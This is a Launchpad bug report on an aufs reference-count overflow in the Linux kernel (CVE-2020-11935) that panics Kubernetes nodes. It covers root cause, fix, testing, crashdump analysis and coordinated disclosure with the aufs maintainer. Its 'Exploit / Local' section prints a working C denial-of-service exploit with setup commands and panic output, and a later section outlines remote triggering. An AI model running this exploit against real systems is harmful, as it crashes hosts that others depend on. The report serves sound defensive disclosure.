kernel panic hit by kube-proxy iptables-save/restore caused by aufs

Bug #1873074 reported by Mauricio Faria de Oliveira
This bug affects 1 person
Affects          Status        Importance  Assigned to                 Milestone
linux (Ubuntu)   Fix Released  Medium      Mauricio Faria de Oliveira
  Xenial         Fix Released  Medium      Mauricio Faria de Oliveira
  Bionic         Fix Released  Medium      Mauricio Faria de Oliveira
  Eoan           Won't Fix     Medium      Mauricio Faria de Oliveira
  Focal          Fix Released  Medium      Mauricio Faria de Oliveira
  Groovy         Won't Fix     Medium      Mauricio Faria de Oliveira

Bug Description

[Impact]

 * Systems with aufs mounts are vulnerable to a kernel BUG(),
   which can turn into a panic/crash if panic_on_oops is set.

 * It is exploitable by unprivileged local users, and potentially
   also through remote access operations (e.g., a web server).

 * This issue has also manifested in Kubernetes deployments
   with a kernel panic in iptables-save or iptables-restore
   after a few weeks of uptime, without user interaction.

 * Usually all Kubernetes worker nodes hit the issue around
   the same time.

[Fix]

 * The issue is fixed with 2 patches in aufs4-linux.git:
 - 515a586eeef3 aufs: do not call i_readcount_inc()
 - f10aea57d39d aufs: bugfix, IMA i_readcount

 * The first addresses the issue, and the second addresses a
   regression in the aufs feature to change RW branches to RO.

 * The kernel v5.3 aufs patches had an equivalent fix to the
   second patch, which is present in the Focal aufs patchset
   (and on ubuntu-unstable/master & /master-5.8 on 20200629)

 - 1d26f910c53f aufs: for v5.3-rc1, maintain i_readcount
   (in aufs5-linux.git)

[Test Case]

 * Repeatedly open/close the same file in read-only mode in
   aufs (UINT_MAX times, to overflow a signed int back to 0.)

 * Alternatively, monitor the underlying filesystem's file
   inode.i_readcount over several open/close system calls.
   (should not monotonically increase; rather, return to 0.)

[Regression Potential]

 * This changes the core path through which aufs opens files,
   so there is a risk of regression; however, the fix makes aufs
   behave the way other filesystems do, so this is generally OK.
   In any case, most regressions would manifest in open() or
   close() (where the VFS handles/checks inode.i_readcount.)

 * The aufs maintainer has an internal test suite for validating
   aufs changes; it identified the first regression (in the
   branch RW/RO mode change), and was then used to validate the
   patches before publishing upstream; should be good now.

 * This has also been tested with 'stress-ng --class filesystem'
   and with 'xfstests -overlay' (patch to use aufs vs overlayfs)
   on Xenial/Bionic/Focal (-proposed vs. -proposed + patches).
   No regressions observed in stress-ng/xfstests log or dmesg.

[Other Info]

 * Applied on Unstable (branches master and master-5.8)
 * Not required on Groovy (still 5.4; should sync from Unstable)
 * Required on LTS releases: Bionic and Focal and Xenial.
 * Required on other releases: Disco and Eoan (for custom kernels)

[Original Bug Description]

Problem Report:
--------------

A user reported that several nodes in their Kubernetes clusters
hit a kernel panic at about the same time, and periodically
(usually after 35 days of uptime, and in the same order the nodes booted.)

The kernel panic messages/stack traces are consistent across
nodes: in __fput(), by iptables-save/restore from kube-proxy.

Example:

"""
[3016161.866702] kernel BUG at .../include/linux/fs.h:2583!
[3016161.866704] invalid opcode: 0000 [#1] SMP
...
[3016161.866780] CPU: 40 PID: 33068 Comm: iptables-restor Tainted: P OE 4.4.0-133-generic #159-Ubuntu
...
[3016161.866786] RIP: 0010:[...] [...] __fput+0x223/0x230
...
[3016161.866818] Call Trace:
[3016161.866823] [...] ____fput+0xe/0x10
[3016161.866827] [...] task_work_run+0x86/0xb0
[3016161.866831] [...] exit_to_usermode_loop+0xc2/0xd0
[3016161.866833] [...] syscall_return_slowpath+0x4e/0x60
[3016161.866839] [...] int_ret_from_sys_call+0x25/0x9f
"""

(uptime: 3016161 seconds / (24*60*60) = 34.91 days)

They have provided a crashdump (privately available) used
for analysis later in this bug report.

Note: the root cause turns out to be independent of K8s,
as explained in the Root Cause section.

Related Report:
--------------

This behavior matches this public bug of another user:
https://github.com/kubernetes/kubernetes/issues/70229

"""
I have several machines happen kernel panic,and these
machine have same dump trace like below:

KERNEL: /usr/lib/debug/boot/vmlinux-4.4.0-104-generic
...
PANIC: "kernel BUG at .../include/linux/fs.h:2582!"
...
COMMAND: "iptables-restor"
...
crash> bt
...
[exception RIP: __fput+541]
...
#8 [ffff880199f33e60] __fput at ffffffff812125ac
#9 [ffff880199f33ea8] ____fput at ffffffff812126ee
#10 [ffff880199f33eb8] task_work_run at ffffffff8109f101
#11 [ffff880199f33ef8] exit_to_usermode_loop at ffffffff81003242
#12 [ffff880199f33f30] syscall_return_slowpath at ffffffff81003c6e
#13 [ffff880199f33f50] int_ret_from_sys_call at ffffffff818449d0
...

The above showed command "iptables-restor" cause the kernel
panic and its pid is 16884,its parent process is kube-proxy.

Sometimes the process of kernel panic is "iptables-save" and
the dump trace are same.

The kernel panic always happens every 26 days(machine uptime)
"""

<< Adding further sections as comments to keep page short. >>

Tags: patch sts

CVE References

Mauricio Faria de Oliveira (mfo) wrote :

Security Impact:
---

The root cause of this problem can be easily exploited
by unprivileged users, both local and remote attackers.

An attacker only needs access to an aufs mount point and
read permission on any file in it, then opens that file
in read-only mode, repeatedly.

For that reason, sending the patch for this, even with
low-profile and boring wording, may reveal enough
information to exploit the problem, so it probably
needs some care and coordination.

Details in 'Exploit / Local' (and Remote) sections.

Mauricio Faria de Oliveira (mfo) wrote :

Security Impact Surface:
---

For Kubernetes itself, this is less likely nowadays with
the move from aufs to overlayfs in Docker (which used to
be the biggest driver for aufs AFAIK), and additionally, new
versions have kube-proxy call iptables-save/restore less.

The versions typically used in the Xenial timeframe (and
which may still be around) still have both (aufs default,
and kube-proxy calling iptables-save more frequently.)

Detailed version numbers for Docker/Kubernetes for that
information can be provided if needed.

...

For the root cause (i.e., independently of Kubernetes),

This affects any distribution which ships aufs filesystem
AND enables CONFIG_IMA (sufficient until the 5.3 kernel)
OR enables CONFIG_FILE_LOCKING (new with the 5.3 kernel);

(either CONFIG option enables i_readcount/that BUG_ON())
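
The condition above can be written down as a small predicate. This is
only a sketch: the function names and the version-tuple representation
are made up for illustration, and the example inputs are hypothetical
configurations, not checked distro settings.

```python
def has_i_readcount(kernel_version, config_ima, config_file_locking):
    """True if the kernel build carries inode.i_readcount (and its BUG_ON()).

    kernel_version is a (major, minor) tuple; the two flags mirror
    CONFIG_IMA and CONFIG_FILE_LOCKING as described in the text above.
    """
    if kernel_version >= (5, 3):
        # From 5.3 on, either option enables the counter.
        return config_ima or config_file_locking
    # Before 5.3, only CONFIG_IMA enables it.
    return config_ima


def is_exposed(ships_aufs, kernel_version, config_ima, config_file_locking):
    """True if the combination described above applies."""
    return ships_aufs and has_i_readcount(
        kernel_version, config_ima, config_file_locking
    )


# Hypothetical inputs, for illustration only.
print(is_exposed(True, (4, 4), True, True))     # True
print(is_exposed(True, (4, 19), False, True))   # False
print(is_exposed(True, (5, 4), False, True))    # True
print(is_exposed(False, (5, 4), True, True))    # False
```

The third case is the reason a newer kernel can re-expose a distro that
had disabled CONFIG_IMA.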

Ubuntu:
--

This is true for all supported Ubuntu releases (T/X/B/E/F),
which ship aufs in the kernel packages as a kernel module.

Debian:
--

This affects Debian too, which ships aufs-dkms to build it.

This is true for Debian Stretch (oldstable) with 4.9 kernel.

This is not true for Debian Buster (stable) with the 4.19 kernel
(as CONFIG_IMA was disabled on 4.16 in Debian, g82596c5122fe)

BUT buster-backports has 5.4 kernel; so if aufs-dkms goes on
to support it, the problem would be exposed on Debian Buster.

This is true for Debian Bullseye (testing), again pending
support from aufs-dkms, which is currently locked to the 5.2
kernel via this DKMS directive (BUILD_EXCLUSIVE_KERNEL="^5.2.*").
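
To see which kernels that directive lets through, the pattern can be
tried against a few release strings. This is a sketch under two
assumptions: that DKMS applies the value as a regular-expression search
on the kernel release string (Python's re module stands in for it here),
and that the release names below, which are made up, resemble real ones.

```python
import re

# Pattern copied from the directive quoted above.
BUILD_EXCLUSIVE_KERNEL = r"^5.2.*"


def builds_for(kernel_release):
    """True if the pattern matches the given kernel release string."""
    return re.search(BUILD_EXCLUSIVE_KERNEL, kernel_release) is not None


# Hypothetical release strings, for illustration only.
for release in ("5.2.0-3-amd64", "5.4.0-4-amd64", "4.19.0-8-amd64"):
    print(release, builds_for(release))
```

Only the 5.2 release matches. Note the dots are unescaped, so a string
such as "5.20.0" would match as well.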

Other Distros:
--

Apparently aufs has little official support on other
distros, as it's not in upstream/mainline Linux,
but there are distro-community efforts that provide it.
- Arch Linux User Repository/AUR
- CentOS community/custom packages on top of
  kernel-lt (longterm) and kernel-ml (mainline) stable pkgs.

Those were not checked.

Mauricio Faria de Oliveira (mfo) wrote :

Root Cause:
----------

Note: this is completely independent of Kubernetes.

The aufs filesystem calls i_readcount_inc() when opening a
file in read-only mode, not paired with an i_readcount_dec().

@ fs/aufs/vfsub.c

struct file *vfsub_dentry_open(struct path *path, int flags)
{
    struct file *file;

    file = dentry_open(path, flags /* | __FMODE_NONOTIFY */,
                       current_cred());
    if (!IS_ERR_OR_NULL(file)
        && (file->f_mode & (FMODE_READ | FMODE_WRITE)) == FMODE_READ)
            i_readcount_inc(d_inode(path->dentry));

    return file;
}

That is _incorrect_ as only the VFS layer should maintain
the 'struct inode.i_readcount' value.

Neither i_readcount_inc() nor i_readcount_dec() should be
called there. They have no callers outside the VFS in the Linux tree.

So,

If the same file is opened in read-only mode enough times,
its backing inode.i_readcount value overflows back to zero.

Once that happens, when the file is closed, __fput() calls
i_readcount_dec(), and that will trigger the BUG_ON().

That causes a kernel panic/crash if panic_on_oops is set;
otherwise, just kernel messages.

By default it's not set, but 'enterprise'/larger users
usually set it in order to save kernel crashdumps on such errors.

See the 'Problem Demonstration / Instrumentation' section
to watch the number overflow and hit the BUG_ON/panic.
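
The overflow can be illustrated with a toy model of the counter. This is
not kernel code: the Inode class, the helper names and the configurable
counter width are made up for illustration, and an 8-bit counter is used
so that the loop finishes quickly (the real i_readcount is a 32-bit
atomic_t, and its wrap through negative values is modelled here with a
plain bit mask).

```python
class BugOn(Exception):
    """Stands in for the kernel's BUG_ON() firing."""


class Inode:
    def __init__(self, bits):
        self.mask = (1 << bits) - 1
        self.i_readcount = 0

    def readcount_inc(self):
        # Wraps around to 0 once the counter width is exceeded.
        self.i_readcount = (self.i_readcount + 1) & self.mask

    def readcount_dec(self):
        # Same check as i_readcount_dec(): a zero count is a bug.
        if self.i_readcount == 0:
            raise BugOn("i_readcount is zero before decrement")
        self.i_readcount = (self.i_readcount - 1) & self.mask


def open_close_read_only(inode, extra_inc):
    inode.readcount_inc()        # VFS, on the read-only open
    if extra_inc:
        inode.readcount_inc()    # the unpaired increment done by aufs
    inode.readcount_dec()        # VFS, in __fput() on close


def cycles_until_bug(bits, extra_inc, limit):
    """Number of open/close cycles until BUG_ON() fires, or None."""
    inode = Inode(bits)
    for cycle in range(1, limit + 1):
        try:
            open_close_read_only(inode, extra_inc)
        except BugOn:
            return cycle
    return None


print(cycles_until_bug(8, True, 1000))    # 255
print(cycles_until_bug(8, False, 1000))   # None
```

With the extra increment, each cycle leaves the count one higher, and
the check fails on cycle 2^bits - 1; for a 32-bit counter that is
UINT_MAX cycles, as in the test case. Without it, the count returns to
zero after every close and the check never fails.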

Mauricio Faria de Oliveira (mfo) wrote :

Workaround:
---

Clean the inode cache, which should remove the inode from
memory, and when it's needed again, it's initialized with
i_readcount zero.

$ echo 2 | sudo tee /proc/sys/vm/drop_caches

This may happen indirectly from time to time on systems,
as part of normal memory cleansing/reclaiming, and thus
the problem might be avoided or never noticed.

This might impact performance, as the inode and dentry
caches are flushed.

Mauricio Faria de Oliveira (mfo) wrote :

Fix:
---

Patch attached ("aufs-do-not-call-i_readcount_inc.patch").

This applies to Ubuntu kernels, aufs upstream, and other
distros' aufs (e.g. Debian aufs-dkms package.)

Attached analysis of the aufs change back in Linux v2.6.39
that introduced the problem ("aufs-intro-i_readcount_inc"),
explaining what happened and why that change is incorrect.

Mauricio Faria de Oliveira (mfo) wrote :

Regression Testing:
---

The fix ran through regression testing with three tools.

No regressions observed between original/patched 5.4.0-21.
- 5.4.0-21-generic #25-Ubuntu SMP Sat Mar 28 13:10:28 UTC 2020
- 5.4.0-21-generic #25+aufs SMP Fri Apr 3 12:09:29 -03 2020

1) stress-ng (on host, and on kube-proxy's aufs mount)

Command: stress-ng --class filesystem --sequential 0 --timeout 5m
(takes about 3 hours to finish.)

The stress-ng logs were normalized for PID/process number
and the unique messages then compared. There are no unexpected
new error messages. The dmesg output was also compared.

The runs on the kube-proxy's aufs mountpoint consisted
of finding which /var/lib/docker/aufs/mnt/ directory
is used by kube-proxy (which triggered the problem)
and running stress-ng over there.

2) xfstests-dev, patched to use aufs instead of overlayfs

The xfstests-dev patch is attached ("xfstests-aufs.patch").
It's not yet upstream -- working on v2 for upstream which
also covers fuse-overlayfs.

The set of test failures is identical for original/patched
kernels, seen as one single unique line across the 2 logs:

$ grep -h '^Failures:' xfstests.{orig,patch}.log | sort -u | wc -l
1

And the number of failures is, of course, identical:

"Failed 357 of 648 tests."

Command: "./check -overlay -E /tmp/exclude-tests" with
10 tests excluded, as they hang the kernel or block tasks.
(steps/details available in the patch message.)

3) smoke test for aufs (from the kernel team)

The smoke test for aufs from the kernel team is located at:
https://kernel.ubuntu.com/git/ubuntu/autotest-client-tests.git/tree/ubuntu_aufs_smoke_test/ubuntu_aufs_smoke_test.sh

Its output is identical on original/patched kernel.

Mauricio Faria de Oliveira (mfo) wrote :

Exploit / Local:
---

The local exploit is trivial as 'mount | grep aufs' says
whether there's an aufs mountpoint, and usually there is
a file that is 'chmod o+r' that any user could read/open.

(This crashed a virtual machine in 8 hours, overnight.)
See the 'Run' output below.

Code:

    $ cat <<EOF >exploit.c
    #include <fcntl.h>
    #include <unistd.h>
    int main() { while (!close(open("test", O_RDONLY))); return 0; }
    EOF

    $ gcc -o /tmp/exploit exploit.c

Setup:

    $ mkdir dir mnt
    $ touch dir/test
    $ sudo mount -t aufs -o br=dir none mnt

    $ ls mnt
    test

Run:

    $ cd mnt && /tmp/exploit
    <just let it run until..>

    [29167.866016] kernel BUG at include/linux/fs.h:2963!
    [29167.867423] invalid opcode: 0000 [#1] SMP PTI
    [29167.868584] CPU: 0 PID: 5314 Comm: exploit Tainted: G OE 5.4.0-21-generic #25-Ubuntu
    [29167.870751] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.12.0-1 04/01/2014
    [29167.873202] RIP: 0010:__fput+0x25d/0x260
    ...
    [29167.901583] Call Trace:
    [29167.902387] ____fput+0xe/0x10
    [29167.903344] task_work_run+0x8f/0xb0
    [29167.904420] exit_to_usermode_loop+0x131/0x160
    [29167.905749] do_syscall_64+0x163/0x190
    [29167.906929] entry_SYSCALL_64_after_hwframe+0x44/0xa9
    ...
    [29167.967808] Kernel panic - not syncing: Fatal exception

(uptime = 29167 seconds / 3600 seconds/hour = 8.10 hours)
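
The uptime also gives a rough idea of the open/close rate involved. The
sketch below assumes UINT_MAX cycles are needed (as in the test case),
that the counter started at zero at boot, and that the whole uptime was
spent in the loop; the function name is made up for illustration. The
Kubernetes node uptime from the problem report is included for
comparison.

```python
UINT_MAX = 2**32 - 1


def implied_rate(uptime_seconds, cycles=UINT_MAX):
    """Average open/close cycles per second needed to wrap within the uptime."""
    return cycles / uptime_seconds


# Uptimes (in seconds) taken from the kernel log timestamps in this report.
for label, uptime in (("exploit run", 29167), ("Kubernetes node", 3016161)):
    hours = uptime / 3600
    days = uptime / (24 * 60 * 60)
    rate = implied_rate(uptime)
    print(f"{label}: {hours:.2f} hours, {days:.2f} days, ~{rate:.0f} cycles/s")
```

That is on the order of 147 thousand cycles per second for the exploit
loop, and about 1.4 thousand per second on average for the Kubernetes
node; both are averages under the assumptions above, not measurements.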

Mauricio Faria de Oliveira (mfo) wrote :

Exploit / Remote:
---

The remote exploit is possible if such file is opened in
response to an event, for example, a web server document
stored in an aufs mountpoint.

This obviously takes more time - each i_readcount_inc() is
delayed by a remote access - but it may be sped up by many
attackers, say a DDoS, if it's possible to figure or brute
force which URLs lead to an aufs-backed file in the server.

(This can happen with Kubernetes/docker containers using
the aufs storage driver for container images for example,
with static document in the container image, and exposed
via a web server, say nginx, a very popular docker image.)

See the 'Problem Demonstration' section w/ this example.

Mauricio Faria de Oliveira (mfo) wrote :

Problem Demonstration / Instrumentation:
---------------------------------------

This kprobe kernel module ("kmod-kprobe-fput.c") inserts a
probe on __fput(), and prints the i_readcount value before
decrementing it, when a specified filename is found.
(usage/steps in the header comments.)

    $ sudo insmod kmod-kprobe-fput.ko
    [ 315.625113] kmod_kprobe_fput: kprobe registered (filename: test, multiple: 0)

The i_readcount value is only incremented on reads, not writes:

    $ touch test
    [ 308.193058] file: test, fs type: ext4, inode readcount: 0

    $ > test
    [ 310.293847] file: test, fs type: ext4, inode readcount: 0

    $ cat test
    [ 312.667149] file: test, fs type: ext4, inode readcount: 1

    $ cat test
    [ 317.312413] file: test, fs type: ext4, inode readcount: 1

    $ cat test
    [ 319.223841] file: test, fs type: ext4, inode readcount: 1

It is decremented only when the file is closed:

    $ tail -f test &
    $ tail -f test &
    $ tail -f test &

    $ cat test
    [ 365.042632] file: test, fs type: ext4, inode readcount: 4

    $ kill %%
    [ 372.241224] file: test, fs type: ext4, inode readcount: 3

    $ kill %%
    [ 376.151455] file: test, fs type: ext4, inode readcount: 2

    $ kill %%
    [ 378.802151] file: test, fs type: ext4, inode readcount: 1

With aufs, there are 2 files/inodes, one in the virtual/aufs
filesystem, another in the (underlying) real/ext4 filesystem.
Then aufs handles/redirects the open/read/write calls to it.

    $ mkdir dir mnt
    $ touch dir/test
    $ sudo mount -t aufs -o br=dir none mnt

    $ ls mnt
    test

The problem is observable upfront: i_readcount for the real
inode/filesystem is incremented one extra time on each read-only open.

    $ cat mnt/test
    [ 453.819165] file: test, fs type: aufs, inode readcount: 1
    [ 453.819226] file: test, fs type: ext4, inode readcount: 2

    $ cat mnt/test
    [ 458.091550] file: test, fs type: aufs, inode readcount: 1
    [ 458.091599] file: test, fs type: ext4, inode readcount: 3

    $ cat mnt/test
    [ 463.165711] file: test, fs type: aufs, inode readcount: 1
    [ 463.165759] file: test, fs type: ext4, inode readcount: 4

Compare that with the non-aufs/ext4-only output above for
multiple cats ;-) - the inode's i_readcount on ext4 grows.

...

That kprobe was enabled during the 'Exploit / Local' run.

The logs show the i_readcount value incrementing until it
overflowed, at which point the BUG_ON() fired and the system panicked.

(With the 'multiple' parameter set, the probe prints only when
i_readcount, taken as an unsigned value, is a multiple of it.)

    $ sudo insmod kmod-kprobe-fput.ko multiple=100000
    [ 1684.953480] kmod_kprobe_fput: kprobe registered (filename: test, multiple: 100000)

    $ cd mnt && /tmp/exploit
    [ 1799.795277] file: test, fs type: ext4, inode readcount: 100000
    [ 1800.420418] file: test, fs type: ext4, inode readcount: 200000
    [ 1801.030687] file: test, fs type: ext4, inode readcount: 300000
    ...
    [ 2428.610831] file: test, fs type: ext4, inode readcount: 100000000
    ...
    [ 7909.385033] file: test, fs type: ext4, inode readcount: 1000000000
    ...
    [14191.533372] file: test, fs type: ext4, inode...


Mauricio Faria de Oliveira (mfo) wrote :

Crashdump Analysis:
------------------

Part 1) Where

The BUG_ON() in fs.h:2583 originates from i_readcount_dec().

This function decrements the struct inode.i_readcount field,
but first it checks whether the value is already zero
(which indeed indicates a bug with the i_readcount balance.)

    2580 #ifdef CONFIG_IMA
    2581 static inline void i_readcount_dec(struct inode *inode)
    2582 {
    2583         BUG_ON(!atomic_read(&inode->i_readcount));
    2584         atomic_dec(&inode->i_readcount);
    2585 }

So, that happened: i_readcount_dec() found i_readcount to be
zero, which is not expected, and triggered the BUG_ON() call.

This is indeed called from __fput():

    static void __fput(struct file *file)
    ...
            if ((file->f_mode & (FMODE_READ | FMODE_WRITE)) == FMODE_READ)
                    i_readcount_dec(inode);

From the crashdump, we can confirm that i_readcount (value
in the EAX register) is indeed zero, and that the code jumps
to ud2 (the undefined/invalid opcode used by BUG()) at
offset 0x223 = 547.

    crash> disass -x __fput
    ...
       0xffffffff81218ad2 <+418>: mov 0x154(%r13),%eax
       0xffffffff81218ad9 <+425>: test %eax,%eax
       0xffffffff81218adb <+427>: je 0xffffffff81218b53 <__fput+547>
    ...
       0xffffffff81218b53 <+547>: ud2

    crash> bt
    ...
        [exception RIP: __fput+547]
    ...
        RAX: 0000000000000000 RBX: ffff882a32191c00 RCX: 000000001b1a76dc
    ...
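
The offsets and addresses in the listing above can be cross-checked with
a few lines of arithmetic. This is only a consistency check on the
numbers already shown; the variable and function names are made up for
illustration.

```python
# Address and offset of the ud2 instruction, from the disassembly above.
UD2_ADDR = 0xFFFFFFFF81218B53
UD2_OFFSET = 547

# Start of __fput(), derived from the two values above.
fput_start = UD2_ADDR - UD2_OFFSET


def addr_of(offset):
    """Address of the instruction at the given offset into __fput()."""
    return fput_start + offset


print(0x223 == UD2_OFFSET)     # True
print(hex(addr_of(418)))       # 0xffffffff81218ad2 (mov 0x154(%r13),%eax)
print(hex(addr_of(425)))       # 0xffffffff81218ad9 (test %eax,%eax)
print(hex(addr_of(427)))       # 0xffffffff81218adb (je <__fput+547>)
```

The exception RIP in the backtrace (__fput+547) and the offset in the
kernel log (__fput+0x223) therefore point at the same ud2 instruction.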

Part 2) What

Looking at which 'struct file' triggered this problem,
we have 'struct inode.i_readcount' at R13 + 0x154, so
inode is at R13 since i_readcount offset is 0x154.

    crash> struct -x -o inode.i_readcount
    struct inode {
      [0x154] atomic_t i_readcount;
    }

    crash> bt
    ...
        R13: ffff883f2ad40e90 R14: ffff887f6368d0a0 R15: ffff883f2ad0d200
    ...

So, inode = ffff883f2ad40e90

Checking the assembly for 'struct file', it's kept at RBX (above.)

So, file = ffff882a32191c00

And the inode pointer in file does match the value we have, good.

    crash> struct -x file.f_inode ffff882a32191c00
      f_inode = 0xffff883f2ad40e90

Now, walking up the file's dentry chain, we get the path:

    crash> struct -x file.f_path.dentry ffff882a32191c00
      f_path.dentry = 0xffff883f2ad0d200

    crash> struct -x dentry.d_name.name,d_parent 0xffff883f2ad0d200
      d_name.name = 0xffff883f2ad0d238 "protocols"
      d_parent = 0xffff883f42a33080

    crash> struct -x dentry.d_name.name,d_parent 0xffff883f42a33080
      d_name.name = 0xffff883f42a330b8 "etc"
      d_parent = 0xffff883f5d747b00

    crash> struct -x dentry.d_name.name,d_parent 0xffff883f5d747b00
      d_name.name = 0xffff883f4e892b50 "7e8d17d0d767bad43bbab4953b457660e2ad9d61162efd00261db0b36c1f7558"
      d_parent = 0xffff883f619cc480

    crash> struct -x dentry.d_name.name,d_parent 0xffff883f619cc480
      d_name.name = 0xffff883f619cc4b8 "diff"
      d_parent = 0xffff883f619ccc00

    crash> struct -x dentry.d_name.name,d_parent 0xffff883f619ccc00
      d_name.name = 0xffff883f619ccc38 "aufs"
      d_parent = 0xffff883f61930780

    crash> struct -x dentry.d_name.name,d_parent 0xffff883f61930780
      d...

Mauricio Faria de Oliveira (mfo) wrote :

Analysis/history of the aufs change back in Linux v2.6.39.

Mauricio Faria de Oliveira (mfo) wrote :

Patch for xfstests-dev to use aufs with the overlayfs suite.

Mauricio Faria de Oliveira (mfo) wrote :

I'm happy to send patches for Ubuntu releases if needed
(and Debian and aufs upstream, for that matter),

Just not yet aware which (private) mailing list/channel
should be used, and how/which coordination is required.

tags: added: sts
J. R. Okajima (hooanon05) wrote :

Mauricio,

Thank you for notifying me (as an upstream developer) and for your thorough
analysis.
Your patch is good, but it didn't pass my local test. Because the test
has a case "branch manipulation: change the branch permission RW to RO."
The test is for an aufs specific feature which enables users to change
the permission of a branch (layer) dynamically. The one RW plus one or
more RO layers case is common, but users can have multiple RW layers and
change them into RO layers without unmounting aufs.

So I added another fix over yours and I am testing it now. It will take
several days.

J. R. Okajima (hooanon05) wrote : Re: [Bug 1873074] Re: kernel panic hit by kube-proxy iptables-save/restore caused by aufs

"J. R. Okajima":
> So I added another fix over yours and I am testing it now. It will take
> several days.

Ah, I should have written more.
"several days" in the above sentence means my regular test takes long
time. It doesn't mean I can try your "multiple" parameter using kprobe
test. The test looks very effective, so if you can, please try it for
my patch in previous post. Obviously it does no harm unless you try
"mount -o remount,mod:/your/rw/branch=ro".

Mauricio Faria de Oliveira (mfo) wrote :

Hi J. R. Okajima,

Good point. I recall that code path to change branches to read-only.

It's not exercised in the several tests I've done (for most common
scenarios.) Thanks for the additional testing.

It was a strong suspect early on, because it changes the underlying
inode's open file mode to read-only, and then an unbalance happens:

because the file was opened in read-write mode (no i_readcount_inc),
and after being changed to read-only, on close it has an i_readcount_dec.
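
That unbalance can be sketched with a toy model. This is not aufs or
kernel code: the classes and helpers are made up for illustration, and
the 'compensate' step is only an assumption about how a counter could be
kept balanced, not a description of the actual patch.

```python
FMODE_READ = 0x1
FMODE_WRITE = 0x2


class BugOn(Exception):
    """Stands in for the kernel's BUG_ON() firing."""


class Inode:
    def __init__(self):
        self.i_readcount = 0


class File:
    def __init__(self, inode, f_mode):
        self.inode = inode
        self.f_mode = f_mode


def is_read_only(f_mode):
    return (f_mode & (FMODE_READ | FMODE_WRITE)) == FMODE_READ


def vfs_open(inode, f_mode):
    if is_read_only(f_mode):
        inode.i_readcount += 1      # only read-only opens are counted
    return File(inode, f_mode)


def vfs_close(file):
    if is_read_only(file.f_mode):
        if file.inode.i_readcount == 0:
            raise BugOn("i_readcount is zero before decrement")
        file.inode.i_readcount -= 1


def branch_rw_to_ro(file, compensate):
    """Flip an already open file to read-only (hypothetical helper)."""
    file.f_mode &= ~FMODE_WRITE
    if compensate:
        file.inode.i_readcount += 1  # assumed compensation, see lead-in


def run(compensate):
    inode = Inode()
    f = vfs_open(inode, FMODE_READ | FMODE_WRITE)   # no increment here
    branch_rw_to_ro(f, compensate)
    try:
        vfs_close(f)                                # decrement happens here
    except BugOn:
        return "BUG_ON"
    return inode.i_readcount


print(run(False))   # BUG_ON
print(run(True))    # 0
```

Without compensation, the close decrements a count that the open never
incremented, which is the unbalance described above.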

I remember the code having warnings that IMA messages could happen
if that is done in aufs; and possibly for this exact reason/change.

I'm not an aufs expert, but I think it's still wrong for aufs to
mess with the file mode of an already open file in the underlying
filesystem, and trying to remedy the failure as a result of that
by messing with the readcount again, under the covers.

Maybe another approach is to close the file if opened in RW mode,
and reopen in RO mode? so that the VFS continues to take care of
the i_readcount value, and aufs doesn't have to play tricks here.

(not sure if that is possible, i don't remember how aufs keeps
the access/syscalls from users of that file; but maybe it is
worth looking at it. -- and if it's too hard to do/does not make
sense, then maybe messing with the i_readcount under the hood
is what works for the time being. :)

Hope this helps,
Mauricio

J. R. Okajima (hooanon05) wrote :

Mauricio Faria de Oliveira:
> I'm not an aufs expert, but I think it's still wrong for aufs to
> mess with the file mode of an already open file in the underlying
> filesystem, and trying to remedy the failure as a result of that
> by messing with the readcount again, under the covers.

Aufs is an ordinary filesystem which is a callee of VFS, at the same
time aufs is a caller of VFS for the branch/layer filesystems. So aufs
handles i_readcount on behalf of VFS.

> Maybe another approach is to close the file if opened in RW mode,
> and reopen in RO mode? so that the VFS continues to take care of
> the i_readcount value, and aufs doesn't have to play tricks here.

Re-open cannot be an option. It will destroy the file lock, file
position or any other file internal parameters.

J. R. Okajima

Mauricio Faria de Oliveira (mfo) wrote :

Right, I think I see your point. Even though it's an ordinary filesystem
as a callee of VFS, it is not as a caller (since most filesystems don't
do that), and in this role, it might have to do non-ordinary things too.

Thanks for clarifying that re-open is not an option. I imagined these
attributes were kept at the aufs file, and that the underlying fs file
was not that related. (as I mentioned, I'm not an aufs expert, nor fs
expert, for that matter.)

In general, i_readcount_inc/dec() outside of VFS is likely not the
"right" thing to do, but this particular case is far from "general"
(given the operation: to change an entire branch/layer RW->RO; and
being an union/layer filesystem; and while files are still open.)

... so I guess there is the "doable" thing to do, right? :)

Thanks for the patch!

J. R. Okajima (hooanon05) wrote :

Mauricio Faria de Oliveira:
> ... so I guess there is the "doable" thing to do, right? :)

Well, my local tests are still going on. If everything goes well, I'd
like to release this fix on next Monday (in my local timezone). If
security guys here want me to wait, let me know as soon as possible.

By the way, I've found there is an almost identical commit in aufs5
repositories.
 1d26f910c53fa 2019-08-03 aufs: for v5.3-rc1, maintain i_readcount

J. R. Okajima

Mauricio Faria de Oliveira (mfo) wrote :

Hi J. R. Okajima,

> If security guys here want me to wait, let me know as soon as possible.

I'll mention that in the email thread we're all on.

Not sure if this is sufficient notice time for some,
as it's already weekend or really close on some TZs.

Hopefully it is, and the thinking is OK to release.

J. R. Okajima (hooanon05) wrote :

Mauricio Faria de Oliveira:
> Not sure if this is sufficient notice time for some,
> as it's already weekend or really close on some TZs.

I see.
Then I'll wait a few more days.

J. R. Okajima

Mauricio Faria de Oliveira (mfo) wrote :

That should help; thank you!

Seth Arnold (seth-arnold) wrote :

Please use CVE-2020-11935 for the reference count issue.

Thanks

J. R. Okajima (hooanon05) wrote : Fwd: aufs4 and aufs5 GIT release (v5.7)

------- Forwarded Message

From: "J. R. Okajima" <email address hidden>
To: <email address hidden>
Subject: aufs4 and aufs5 GIT release (v5.7)
Date: Mon, 29 Jun 2020 10:32:38 +0900
Message-ID: <2412.1593394358@jrobl>

o news
- - linux-v5.7 is released. so is aufs5.7 branch.
  aufs5.8-rcN is not started yet.

o bugfix
- - do not call i_readcount_inc(), reported and fixed by Mauricio Faria de
  Oliveira.
- - related to above, fix IMA i_readcount.

J. R. Okajima

- ----------------------------------------
- - aufs4-linux.git
      aufs: bugfix, IMA i_readcount
      aufs: do not call i_readcount_inc()

- - aufs4-standalone.git
  ditto

- - aufs5-linux.git
  ditto

- - aufs5-standalone.git
  ditto

- - aufs-util.git
  nothing

------- End of Forwarded Message

Changed in linux (Ubuntu):
status: New → In Progress
Changed in linux (Ubuntu Bionic):
status: New → In Progress
importance: Undecided → Medium
assignee: nobody → Mauricio Faria de Oliveira (mfo)
Changed in linux (Ubuntu Eoan):
status: New → Won't Fix
importance: Undecided → Medium
assignee: nobody → Mauricio Faria de Oliveira (mfo)
Changed in linux (Ubuntu Focal):
status: New → In Progress
